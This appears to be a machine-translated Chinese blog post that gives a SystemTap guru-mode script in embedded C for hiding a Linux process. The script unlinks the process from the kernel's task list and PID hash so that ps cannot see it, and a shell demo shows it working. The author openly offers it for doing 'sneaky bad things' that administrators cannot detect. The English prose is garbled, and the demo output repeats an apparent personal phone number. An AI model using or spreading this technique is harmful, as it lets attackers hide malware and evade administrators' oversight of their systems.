While not directly recommend the use of the Linux system root login, but a lot of times, we still will log in as root, so this article will assume you are logged into the system using root.
You want to write a process, sneaky dry point bad things, or brazenly continue to output on the screen manager's cell phone number, and all this but let managers either can not be found, or even if they are also the manager found him anything about it?
Yes, you definitely want to do it, just like me, you have to do, you just put this process to hide out.
It has nothing to hide and process manager, it is a craft job. Too many hidden process method, such as using LD_PRELOAD redefine ps output, such as a filter remount the procfs certain processes, and so on.
But these are too complicated! I have here a most direct way, that is needed to remove hidden processes from the corresponding data structures directly in the kernel.
Specific remove it from where?
We know, to find a process, there are two methods to correspond to two actions:
- tasks linked list traversal system, one by one check. We need to remove it from the tasks list init_task in.
- From PID to look up the list according to pid. We need to remove it from PIDTYPE_PID hlist table.
It's that simple.
But to do the whole work, After funny manager, we have never seen the process of hidden recovery.
Well, the last code. Today I used systemtap Guru expert mode, the embedded C language systemtap script and oneshot execution.
code show as below:
// hide_process.stp
%{
#include <linux/module.h>
%}
function hide_your_process:long(pid:long, type:long, addr:long)
%{
struct task_struct *task = NULL;
struct pid_link *link = NULL;
if (STAP_ARG_type == 0) {
struct hlist_node *node = NULL;
task = pid_task(find_vpid(STAP_ARG_pid), PIDTYPE_PID);
link = &task->pids[PIDTYPE_PID];
list_del_rcu(&task->tasks);
INIT_LIST_HEAD(&task->tasks);
node = &link->node;
hlist_del_rcu(node);
INIT_HLIST_NODE(node);
// 很重要!不然如果你Ctrl-C被隐藏的进程或者任何前台方式给它足以致死的signal时,detach_pid时会crash掉!
node->pprev = &node;
STAP_PRINTF("你要隐藏的进程地址: %p 请牢记!恢复的时候请传入第三个参数\n", task);
} else if (STAP_ARG_type == 1) {
task = (struct task_struct *)STAP_ARG_addr;
link = &task->pids[PIDTYPE_PID];
hlist_add_head_rcu(&link->node, &link->pid->tasks[PIDTYPE_PID]);
list_add_tail_rcu(&task->tasks, &init_task.tasks);
STAP_PRINTF("隐藏的进程[%p]已经恢复!\n", task);
}
STAP_RETVALUE = 0;
%}
probe begin
{
printf("隐藏:stap -g hide.stp $进程号 0 1234\n");
printf("恢复:stap -g hide.stp 1234 1 $隐藏时输出的地址\n\n");
hide_your_process($1, $2, $3);
exit(); // oneshot模式
}
Well, look at the effect:
As for the bug list did not lock operation and the like, plus you can not add nor affect use.
In addition, many people will feel about procfs modify task dir lookup can be achieved, but I think too complicated. I am the most simple, a few lines of code, not code craftsmen also very helpless, so be tricky.
Playing a?
[root@localhost ~]#
[root@localhost ~]# ./JingLi\'SkinShoe
经理的皮鞋湿了,但是不会胖!如果胖了请联系经理:15618501939
经理的皮鞋湿了,但是不会胖!如果胖了请联系经理:15618501939
经理的皮鞋湿了,但是不会胖!如果胖了请联系经理:15618501939
经理的皮鞋湿了,但是不会胖!如果胖了请联系经理:15618501939
经理的皮鞋湿了,但是不会胖!如果胖了请联系经理:15618501939
经理的皮鞋湿了,但是不会胖!如果胖了请联系经理:15618501939
Hide it chant:
[root@localhost test]# ps -e |grep JingLi
6607 pts/1 00:00:00 JingLi'SkinShoe
[root@localhost test]# stap -g ./hide_process.stp 6607 0 12345
隐藏:stap -g hide.stp $进程号 0 1234
恢复:stap -g hide.stp 1234 1 $隐藏时输出的地址
你要隐藏的进程地址: 0xffff8800365818c0 请牢记!恢复的时候请传入第三个参数
Ps less than it is now ...
[root@localhost test]# ps -e |grep JingLi
[root@localhost test]# echo $?
1
Wenzhou shoes wet, rain water will not be fat.
